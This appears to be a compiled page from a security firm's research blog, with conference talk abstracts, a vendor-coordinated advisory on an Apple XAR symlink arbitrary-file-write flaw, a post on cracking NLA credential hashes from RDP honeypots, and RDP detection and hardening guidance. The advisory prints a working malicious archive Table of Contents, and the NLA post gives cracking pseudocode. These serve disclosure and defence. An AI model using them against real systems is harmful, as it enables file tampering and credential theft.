• Alex Plaskett, “Pwning the Windows 10 Kernel with NTFS and WNF”, to be presented at Power of Community 2021 (November 11-12 2021)
• Tennisha Martin, “Keynote: The Hacker’s Guide to Mentorship: Fostering the Diverse Workforce of the Future”, to be presented at SANS Pentest HackFest (November 15-16 2021)
• Jennifer Fernick, “Financial Post-Quantum Cryptography in Production: A CISO’s Guide”, to be presented at FS-ISAC (Nov 30 2021)

Keynote: Securing Open Source Software
Jennifer Fernick (NCC Group) & David Wheeler (Linux Foundation)
The Linux Foundation Member Summit
November 2-4 2021

Sleight of ARM: Demystifying Intel Houdini
Brian Hong

Ekoparty
November 2-6 2021

In the recent years, we have seen some of the major players in the industry switch from x86-based processors to ARM processors. Most notable is Apple, who has supported the transition to ARM from x86 with a binary translator, Rosetta 2, which has recently gotten the attention of many researchers and reverse engineers. However, you might be surprised to know that Intel has their own binary translator, Houdini, which runs ARM binaries on x86.

In this talk, we will discuss Intel’s proprietary Houdini translator, which is primarily used by Android on x86 platforms, such as higher-end Chromebooks and desktop Android emulators. We will start with a high-level discussion of how Houdini works and is loaded into processes. We will then dive into the low-level internals of the Houdini engine and memory model, including several security weaknesses it introduces into processes using it. Lastly, we will discuss methods to escape the Houdini environment, execute arbitrary ARM and x86, and write Houdini-targeted malware that bypasses existing platform analysis.

Phish like an APT: Phenomenal pretexting for persuasive phishing
Sanne Maasakkers

Ekoparty
November 2-6 2021

Symposium on Post-Quantum Cryptography: Act now, not later

CWI Symposium on Post-Quantum Cryptography
November 3 2021

The Symposium Post-Quantum Cryptography is part of a series organized by CWI Cryptology Group and TNO. The first symposium in April 2021 was a general introduction to the problem from the perspective of industry, government, and end user. In this second episode we zoom in on a number of specific topics, including quantum-safe PKI, the relation between PQC and QKD, and PQC standards & implementation. The symposium is aimed at higher management and security professionals from government, private sector, and industry.

Cryptography is at the heart of internet security. However, much of the currently deployed cryptography is vulnerable to quantum attacks, which will become effective once large-scale quantum computers become feasible. Therefore, the affected cryptographic standards must be replaced by ones that offer security against quantum attacks. The post-quantum cryptography transition may take organizations ten years to complete, or longer. To remain secure and comply with legal and regulatory requirements, affected organizations should act now. What do you need to know – and what can you do – in order to continue your course of business securely?

“We Wait, Because We Know You” – Inside the Ransomware Negotiation Economics
Pepjin Hack & Zong-Yu Wu

Black Hat Europe 2021
November 8-11 2021

Organizations worldwide continue to face waves of digital extortion in the form of targeted ransomware. Digital extortion is therefore now classified as the most prominent form of cybercrime and the most devastating and pervasive threat to functioning IT environments. Currently, research on targeted ransomware activity primarily looks at how these attacks are carried out from a technical perspective. Little research has however focused on the economics behind digital extortions and digital extortion negotiation strategies using empirical methods.

This session explores three main topics. First, can we explain how adversaries use economic models to maximize their profits? Second, what does this tell us about the position of the victim during the negotiation phase? And third, what strategies can ransomware victims leverage to even the playing field? To answer these questions, over seven hundred attacker-victim negotiations, between 2019 and 2020, were collected and bundled into a dataset. This dataset was subsequently analyzed using both quantitative and qualitative methods.

Analysis of the final ransom agreement reveals that adversaries already know how much victims will pay, even before the negotiations have started. Each ransomware gang has created its own negotiation and pricing strategies meant to maximize its profits. We however provide multiple strategies which can be used by victims to obtain a more favorable outcome. These strategies are taken from negotiation failures and successes derived from the cases we have analyzed and are accompanied by examples and quotes from actual conversations.

When ransomware hits a company, they find themselves in the middle of an unknown situation. One thing that makes those more manageable is to have as much information as possible. We aim to provide victims with some practical tips they can use when they find themselves in the middle of that crisis.

The 5G threat landscape
Philip Marsden

Control Systems Cybersecurity Europe 2021
November 9-10 2021

While the move to 5G mobile deployments presents a wealth of opportunities and capabilities for us all, the technology also introduces new vulnerabilities and threats. There are three main threat vectors across the various 5G domains and within these are sub-threats that describe additional points of vulnerability for threat actors to exploit. While not all inclusive, these types of threats have the potential to increase risk to a particular mobile operator as they transitions to 5G. The Policy and Standards, securing the Supply Chain and finally the 5G systems architecture itself all have various vulnerabilities associated with them and are the foundation for securing the 5G future infrastructure. These threats could be cascaded by attackers to further leverage access to your 5G network and compromise hosts or the endpoint user devices be it a IoT device, a handset or a connected vehicle. This overview will attempt to show these threats and specific issues that might pose a risk to IoT/Control system devices and highlight how to mitigate these.

Dark Reading panel: Ransomware as the New Normal
Pepjin Hack (NCC Group), Kelly Jackson Higgins (Dark Reading), & Rik Turner (Omdia)

November 10 2021

It’s the same story, different victim, over and over: a hospital, school system, or business (think Colonial Pipeline) gets hit with a ransomware attack that locks down their servers, their operations, and in the case of healthcare organizations, places their patients at physical risk. Even with increased awareness, known best practices, and now, the governments like the US putting the squeeze on attackers and their cryptocurrency cover, there’s still no real end in sight to ransomware.

A panel of security experts will discuss and debate why ransomware attacks are so easy to pull off, why they’re so hard to stop – and what organizations need to do to double down on their defenses against one of these debilitating cyberattacks.

Pwning the Windows 10 Kernel with NTFS and WNF

Power of Community 2021
November 11-12 2021

A local privilege escalation vulnerability (CVE-2021-31956) 0day was identified as being exploited in the wild by Kaspersky. At the time it affected a broad range of Windows versions (right up to the latest and greatest of Windows 10).
With no access to the exploit or details of how it worked other than a vulnerability summary the following plan was enacted:

1. Understand how exploitable the issue was in the presence of features such as the Windows 10 Kernel Heap-Backed Pool (Segment Heap).
2. Determine how the Windows Notification Framework (WNF) could be used to enable novel exploit primitives.
3. Understand the challenges an attacker faces with modern kernel pool exploitation and what factors are in play to reduce reliability and hinder exploitation.
4. Gain insight from this exploit which could be used to enable detection and response by defenders.

The talk covers the above key areas and provides a detailed walk through, moving from introducing the subject, all the way up to the knowledge which is needed for both offense and defence on modern Windows versions.

Keynote: The Hacker’s Guide to Mentorship: Fostering the Diverse Workforce of the Future
Tennisha Martin

SANS Pentest HackFest
November 15-16 2021

Mentoring is often used to foster talent within an organization, pairing a junior employee with a more senior high performer.  The mentee learns to mirror the behaviors of the mentor, which can be key to advancement.  However, it can also lead to a subconscious bias, where employees end up hiring people just like them. This results in organizations that are homogeneous in their thoughts, viewpoints, backgrounds, ideas, perspectives, and approaches to problem solving. In a pen testing context, this leads to similar approaches to vulnerability discovery, testing, and results analysis. Pen testing is all about repeatable processes, and when you don’t change, you don’t learn anything or find anything new. Pen testers need a new approach to mentorship, one that recognizes the impact of a diversified workforce on business outcomes such as increasing innovation, diversifying skill sets, increasing motivation and engagement, and, critically, retain high-potential talent. The Hacker’s Guide to Mentorship provides an outline of how to improve your bottom line by fixing your talent problem.

Financial Post-Quantum Cryptography in Production: A CISO’s Guide
Jennifer Fernick

FS-ISAC
November 30 2021

Security leaders have to constantly filter signal from noise about emerging threats, including security risks associated with novel emerging technologies like quantum computing. In this presentation, we will explore post-quantum cryptography specifically through the lens of upgrading financial institutions’ cryptographic infrastructure.

We’re going to take a different approach to most post-quantum presentations, by not discussing quantum mechanics or why quantum computing is a threat, and instead starting from the known fact that most of the public-key cryptography on the internet will be trivially broken by existing quantum algorithms, and cover strategic applied security topics to address this need for a cryptographic upgrade, such as:

• Financial services use cases for cryptography and quantum-resistance, and context-specific nuances in computing environments such as mainframes, HSMs, public cloud, CI/CD pipelines, third-party and multi-party financial protocols, customer-facing systems, and more
• Whether quantum technologies like QKD are necessary to achieve quantum-resistant security
• Post-quantum cryptographic algorithms for digital signatures, key distribution, and encryption
• How much confidence cryptanalysts currently have in the quantum-resistance of those ciphers, and what this may mean for cryptography standards over time
• Deciding when to begin integrating PQC in a world of competing technology standards
• Designing extensible cryptographic architectures
• Actions financial institutions’ cryptography teams can take immediately

This presentation is rooted in both research and practice, is entirely vendor- and product-agnostic, and will be easily accessible to non-cryptographers, helping security leaders think through the practical challenges and tradeoffs when deploying quantum-resistant technologies.

NCC Group Research

Technical Advisory – Apple XAR – Arbitrary File Write (CVE-2021-30833)

Vendor: Apple
Vendor URL: https://www.apple.com/
Versions affected: xar 1.8-dev
Systems Affected: macOS versions below 12.0.1
Author: Richard Warren <richard.warren[at]nccgroup[dot]trust>
CVE Identifier: CVE-2021-30833
Risk: 5.0 Medium CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N

Summary

XAR is a file archive format used in macOS, and is part of various file formats, including .xar, .pkg, .safariextz, and .xip files. XAR archives are extracted using the xar command-line utility. XAR was initially developed under open source, however, the original project appears to be no longer maintained. Apple maintains their own branch of XAR for macOS, which is published on the Apple Open Source website. The xar utility suffers from a logical vulnerability which allows files to be extracted outside of the intended destination folder, resulting in arbitrary file write anywhere on the filesystem (permissions allowing).

Impact

An attacker could construct a maliciously crafted .xar file, which when extracted by a user, would result in files being written to a location of the attacker’s choosing. This could be abused to gain Remote Code Execution.

Details

The XAR archive format supports archiving and extraction of symlinks for both files and directories. When extracting an archive which contains both a directory symlink and a file within a directory named the same as the directory symlink, xar will overwrite the directory symlink with a real directory. This protects against maliciously crafted archives where a symlink directory is unarchived and a file is unarchived into it. An example of the Table of Contents (ToC) for a .xar file in this scenario is shown below:

<?xml version="1.0" encoding="UTF-8"?>
<xar>
<toc>
<checksum style="sha1">
<offset>0</offset>
<size>20</size>
</checksum>
<file id="1">
<name>xx</name>
</file>
<file id="2">
<type>directory</type>
<name>x</name>
<file id="3">
<data>
<length>6</length>
<encoding style="application/octet-stream"/>
<offset>20</offset>
<size>6</size>
<extracted-checksum style="sha1">aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d</extracted-checksum>
<archived-checksum style="sha1">aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d</archived-checksum>
</data>
<type>file</type>
<name>foo</name>
</file>
</file>
</toc>


As shown below, this results in the directory “x” being created in the current directory, and the file foo being written within it, rather than to the /tmp/ directory – which was the target of the directory symlink:

However, xar allows for a forward-slash separated path to be specified in the file name property, e.g. <name>x/foo</name> – as long as it doesn’t traverse upwards, and the path exists within the current directory. This means an attacker can create a .xar file which contains both a directory symlink, and a file with a name property which points into the extracted symlink directory. By abusing symlink directories in this manner, an attacker can write arbitrary files to any directory on the filesystem – providing the user has permissions to write to it. An example of the ToC for a malicious .xar file which exploits this vulnerability is shown below:

<?xml version="1.0" encoding="UTF-8"?>
<xar>
<toc>
<checksum style="sha1">
<offset>0</offset>
<size>20</size>
</checksum>
<file id="1">
<name>.x</name>
</file>
<file id="2">
<data>
<length>6</length>
<encoding style="application/octet-stream"/>
<offset>20</offset>
<size>6</size>
<extracted-checksum style="sha1"> aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d</extracted-checksum>
<archived-checksum style="sha1"> aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d</archived-checksum>
</data>
<type>file</type>
<name>.x/test</name>
</file>
</toc>
</xar>

The following screenshot shows successful exploitation of this vulnerability to write a file into the /tmp/ directory using a directory symlink:

Recommendation

Update to macOS 12.0.1 or above.

Vendor Communication

2021-06-04 – Reported to Apple Product Security.
2021-06-08 - Apple advise they are investigating the report and require more than 30 days.
2021-06-24 - Apple confirm they are able to reproduce the vulnerability and are working to address in a future major macOS update.
2021-08-17 - We request an estimated date for a fix from Apple.
2021-08-19 - Apple advise they are still working on addressing the issue. Request that we hold off any disclosure.
2021-10-25 - macOS 12.0.1 released, which addresses the reported vulnerability.
2021-10-28 - Advisory published.

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published Date: 2021-10-28

Written By: Richard Warren

NCC Group Research

Public Report – WhatsApp End-to-End Encrypted Backups Security Assessment

During the summer of 2021, WhatsApp engaged NCC Group’s Cryptography Services team to conduct an independent security assessment of its End-to-End Encrypted Backups project. End-to-End Encrypted Backups is an hardware security module (HSM) based key vault solution that aims to primarily support encrypted backup of WhatsApp user data. This assessment was performed remotely, as a 35 person-day effort by three NCC Group consultants over the course of five weeks. NCC Group and the WhatsApp team scheduled the retesting of findings, and preparation of this public report a few weeks later, following the delivery of the initial security assessment.

NCC Group Research

Cracking RDP NLA Supplied Credentials for Threat Intelligence

NLA Honeypot Part Deux

This is a continuation of the research from Building an RDP Credential Catcher for Threat Intelligence. In the previous post, we described how to build an RDP credential catcher for threat intelligence, with the caveat that we had to disable NLA in order to receive the password in cleartext. However, RDP clients may be attempting to connect with NLA enabled, which is a stronger form of authentication that does not send passwords in cleartext. In this post, we discuss our work in cracking the hashed passwords being sent over NLA connections to ascertain those supplied by threat actors.

This next phase of research was undertaken by Ray Lai and Ollie Whitehouse.

What is NLA?

NLA, or Network Level Authentication, is an authentication method where a user is authenticated via a hash of their credentials over RDP. Rather than passing the credentials in cleartext, a number of computations are performed on a user’s credentials prior to being sent to the server. The server then performs the same computations on its (possibly hashed) copy of the user’s credentials; if they match, the user is authenticated.

By capturing NLA sessions, which includes the hash of a user’s credentials, we can then perform these same computations using a dictionary of passwords, crack the hash, and observe which credentials are being sprayed at RDP servers.

The plan

1. Capture a legitimate NLA connection.
2. Parse and extract the key fields from the packets.
3. Replicate the computations that a server performs on the extracted fields during authentication.

In order to replicate the server’s authentication functionality, we needed an existing server that we could look into. To do this, we modified FreeRDP, an open-source RDP client and server software that supported NLA connections.

Our first modification was to add extra debug statements throughout the code in order to trace which functions were called during authentication. Looking at this list of called functions, we determined six functions that either parsed incoming messages or generated outgoing messages.

There are six messages that are sent (“In” or “Out” is from the perspective of the server, so “Negotiate In” is a message sent from the client to the server):

1. Negotiate In
2. Negotiate Out
3. Challenge In
4. Challenge Out
5. Authenticate In
6. Authenticate Out

Once identified, we patched these functions to write the packets to a file. We named the files XXXXX.NegotiateIn, XXXXX.ChallengeOut, etc., with XXXXX being a random integer that was specific to that session, so that we could keep track of which packets were for which session.

Parsing the packets

With the messages stored in files, we began work to parse these messages. For a proof of concept, we wrote a parser for these six messages in Python in order to have a high-level understanding of what was needed in order to crack the hashes contained within the messages. We parsed out each field into its own object, taking hints from FreeRDP code.

Dumping intermediary calculations

When it came time to figure out what type of calculation was being performed by each function (or each step of the function), we also added code to individual functions to dump raw bytes that were given as inputs and outputs in order to ensure that the calculations were correctly done in the Python code.

Finally, authentication

The ultimate step in NLA authentication is when the server receives the “Authentication In” message from the client. At that point, it takes all the previous messages, performs some calculation on it, and compares it with the “MIC” stored in the “Authentication In” message.

MIC stands for Message Integrity Check, and is roughly the following:

# User, Domain, Password are UTF-16 little-endian
NtlmV2Hash = HMAC_MD5(NtHash, User + Domain)
ntlm_v2_temp_chal = ChallengeOut->ServerChallenge
+ "\x01\x01\x00\x00\x00\x00\x00\x00"
+ ChallengeIn->Timestamp
+ AuthenticateIn->ClientChallenge
+ "\x00\x00\x00\x00"
+ ChallengeIn->TargetInfo
NtProofString = HMAC_MD5(NtlmV2Hash, ntlm_v2_temp_chal)
KeyExchangeKey = HMAC_MD5(NtlmV2Hash, NtProofString)
if EncryptedRandomSessionKey:
ExportedSessionKey = RC4(KeyExchangeKey, EncryptedRandomSessionKey)
else:
ExportedSessionKey = KeyExchangeKey
msg = NegotiateIn + ChallengeIn + AuthenticateOut
MIC = HMAC_MD5(ExportedSessionKey, msg)

In the above algorithm, all values are supplied within the six NLA messages (User, Domain, Timestamp, ClientChallenge, ServerChallenge, TargetInfo, EncryptedRandomSessionKey, NegotiateIn, ChallengeIn, and AuthenticateOut), except for one: Password.

But now that we have the algorithm to calculate the MIC, we can perform this same calculation on a list of passwords. Once the MIC matches, we have cracked the password used for the NLA connection!

At this point we are ready to start setting up RDP credential catchers, dumping the NLA messages, and cracking them with a list of passwords.

Code

All the code we developed as part of this project we have open sourced here – https://github.com/nccgroup/nlahoney this includes:

Along with all our supporting research notes and code.

Future

The next logical step would be to rewrite the Python password cracker into a hashcat module, left as an exercise to the reader.

NCC Group Research

Overview

Remote Desktop Protocol (RDP) is how users of Microsoft Windows systems can get a remote desktop on systems remotely to manage one or more workstations and/or servers.  With the increase of organizations opting for remote work, so to has RDP usage over the internet increased. However, RDP was not initially designed with the security and privacy features needed to use it securely over the internet. RDP communicates over the widely known port 3389 making it very easy to discover by criminal threat actors.  Furthermore, the default authentication method is limited to only a username and password.

The dangers of RDP exposure, and similar solutions such as TeamViewer (port 5958) and VNC (port 5900) are demonstrated in a recent report published by cybersecurity researchers at Coveware. The researchers found that 42 percent of ransomware cases in Q2 2021 leveraged RDP Compromise as an attack vector. They also found that “In Q2 email phishing and brute forcing exposed remote desktop protocol (RDP) remained the cheapest and thus most profitable and popular methods for threat actors to gain initial foot holds inside of corporate networks.”

RDP has also had its fair share of critical vulnerabilities targeted by threat actors. For example, the BlueKeep vulnerability (CVE- 2019-0708) first reported in May 2019 was present in all unpatched versions of Microsoft Windows 2000 through Windows Server 2008 R2 and Windows 7.  Subsequently, September 2019 saw the release of a public wormable exploit for the RDP vulnerability.

The following details are provided to assist organizations in detecting, threat hunting, and reducing malicious RDP attempts.

The Challenge for Organizations

The limitations of authentication mechanisms for RDP significantly increases the risk to organizations with instances of exposed RDP to the internet. By default, RDP does not have a built-in multi-factor authentication (MFA). To add MFA to RDP logins, organizations will have to implement a Remote Desktop Gateway or place the RDP server behind a VPN that supports MFA. However, these additional controls add cost and complexity that some organizations may not be able to support.

The risk of exposed RDP is further highlighted through user propensity for password reuse. Employees using the same password for RDP as they do for other websites means if a website gets breached, threat actors will likely add that password to a list for use with brute force attempts.

Organizations with poor password policies are bound to the same pitfalls as password reuse for RDP.  Shorter and easily remembered passwords give threat actors an increased chance of success in the brute force of exposed RDP instances.

Another challenge is that organizations do not often monitor RDP logins, allowing successful RDP compromises to go undetected. In the event that RDP logins are collected, organizations should work to make sure that, at the very least, timestamps, IP addresses, and the country or city of the login are ingested into a log management solution.

Detection

Detecting the use of RDP is something that is captured in several logs within a Microsoft Windows environment. Unfortunately, most organizations do not have a log management or SIEM solution to collect the logs that could alert to misuse, furthering the challenge to organizations to secure RDP.

RDP Access in the logs

RDP logons or attacks will generate several log events in several event logs.  These events will be found on the target systems that had RDP sessions attempted or completed, or Active directory that handled the authentication.  These events would need to be collected into a log management or SIEM solution in order to create alerts for RDP behavior.  There are also events on the source system that can be collected, but we will save that for another blog.

Being that multiple log sources contain RDP details, why collect more than one? The devil is in the details, and in the case of RDP artifacts, various events from different log sources can provide greater clarity of RDP activities. For investigations, the more logs, the better if malicious behavior is suspected.

Of course, organizations have to consider log management volume when ingesting new log sources, and many organizations do not collect workstation endpoint logs where RDP logs are generated. However, some of the logs specific to RDP will generally have a low quantity of events and are likely not to impact a log management volume or license. This is especially true because RDP logs are only found on the target system, and typically RDP is seldom used for workstations.

Generally, if you can collect a low noise/volume high validity event from all endpoints into a log management solution, the better your malicious detection can be. An organization will need to test and decide which events to ingest based collectively on their environment, log management solution, and the impact on licensing and volume.

The Windows Advanced Audit Policy will need to have the following policy enabled to collect these events:

• Logon/Logoff – Audit Logon = Success and Failed

The following query logic can be used and contain a lot of details about all authentication to a system, so a high volume event:

• Event Log = Security
• Event ID = 4624 (success)
• Event ID = 4625 (failed)
• Logon Type = 10 (RDP)
• Account Name = The user name logging off
• Workstation Name = This will be from the log of system being logged off from

Optionally, another logon can be enabled to collect RDP events, but this will also generate a lot of other logon noise.  The Windows Advanced Audit Policy will need to have the following policy enabled to collect these events:

• Logon/Logoff – Other Logon/Logoff Events = Success and Failed

The following query logic can be used and contain a few details about session authentication to a system, so a low volume event:

• Event Log = Security
• Event ID = 4778 (connect)
• Event ID = 4779 (disconnect)
• Account Name = The user name logging off
• Session Name = RDP-Tcp#3
• Client Name = This will be the system name of the source system making the RDP connection
• Client Address = This will be the IP address of the source system making the RDP connection

There are also several RDP logs that will record valuable events that can be investigated during an incident to determine the source of the RDP login.  Fortunately, the Windows Advanced Audit Policy will not need to be updated to collect these events and are on by default:

The following query logic can be used and contain a few details about RDP connections to a system, so a low volume event:

• Event Log = Microsoft-Windows-TerminalServices-LocalSessionManager
• Event ID = 21 (RDP connect)
• Event ID = 24 (RDP disconnect)
• User = The user that made the RDP connection
• Source Network Address = The system where the RDP connection originated
• Message = The connection type

The nice thing about having these logs is that even if a threat actor clears the log before disconnecting, the Event ID 24 (disconnect) will be created after the logs have been cleared and then the user disconnects.  This allows tracing of the path of the user and/or treat actor took from system to system.

The following query logic can be used and contain a few details about RDP connections to a system, so a low volume event:

Event Log = Microsoft-Windows-TerminalServices-RemoteConnectionManager

• Event ID = 1149 (RDP connect)
• User = The user that made the RDP connection
• Source Network Address = The system where the RDP connection originated

Event Log = Microsoft-Windows-TerminalServices-RDPClient

• Event ID = 1024 (RDP connection attempt)
• Event ID = 1102 (RDP connect)
• Message = The system where the RDP connection originated

Threat Hunting

The event IDs previously mentioned would be a good place to start when hunting for RDP access. Since RDP logs are found on the target host, an organization will need to have a solution or way to check each workstation and server for these events in the appropriate log or use a log management SIEM solution to perform searches. Threat actors may clear one or more logs before disconnecting, but fortunately, the disconnect event will be in the logs allowing the investigator to see the source of the RDP disconnect. This disconnect (event ID 24) can be used to focus hunts on finding the initial access point of the RDP connection if the logs are cleared.

Reduction/Prevention

The best and easiest option to reduce the likelihood of malicious RDP attempts is to remove RDP from being accessible from the internet.  NCC Group has investigated many incidents where our customers have had RDP open to the internet only to find that it was actively under attack without the client knowing it or the source of the compromise.  Knowing that RDP is highly vulnerable, as the Coveware report states, removing RDP from the internet, securing it, or finding another alternative is the highest recommendation NCC Group can make for organizations that need RDP for remote desktop functions.

Remote Desktop Gateway

Remote Desktop Gateway (RD Gateway) is a role that is added to a Windows Server that you publish to the internet that provides SSL (encrypted RDP over ports TCP 443 and UDP 3391) access instead of the RDP protocol over port 3389.  The RD Gateway option is more secure than just RDP alone, but still should be protected with MFA.

Virtual Private Network (VPN)

Another standard option to reduce malicious RDP attempts is to use RDP behind a VPN.  If VPN infrastructure is already in place, organizations have, or can easily adjust their firewalls to meet this.  Organizations should also monitor VPN logins for access attempts, and the source IP resolved to the country of origin.  Known good IP addresses for users can be implemented to reduce the noise of voluminous VPN access alerts and highlight anomalies.

Jump Host

Many organizations utilize jump hosts protected by MFA to authenticate before to internal systems via RDP.  However, keep in mind that jump hosts face the internet and are thus susceptible to flaws in the jump host application. Therefore, organizations should monitor the jump host application and apply patches as fast as possible.

Cloud RDP

Another option is to use a cloud environment like Microsoft Azure to host a remote solution that provides MFA to deliver trusted connections back to the organization.

Change the RDP Listening Port

Although not recommended to simply prevent RDP attacks, swapping the default port from 3389 to another port can be helpful from a detection standpoint. By editing the Windows registry, the default listening port can be modified, and organizations can implement a SIEM detection to capture port 3389 attempts. However, keep in mind that even though the port changes, recon scans can easily detect RDP listening on a given port in which an attacker can then change their port target.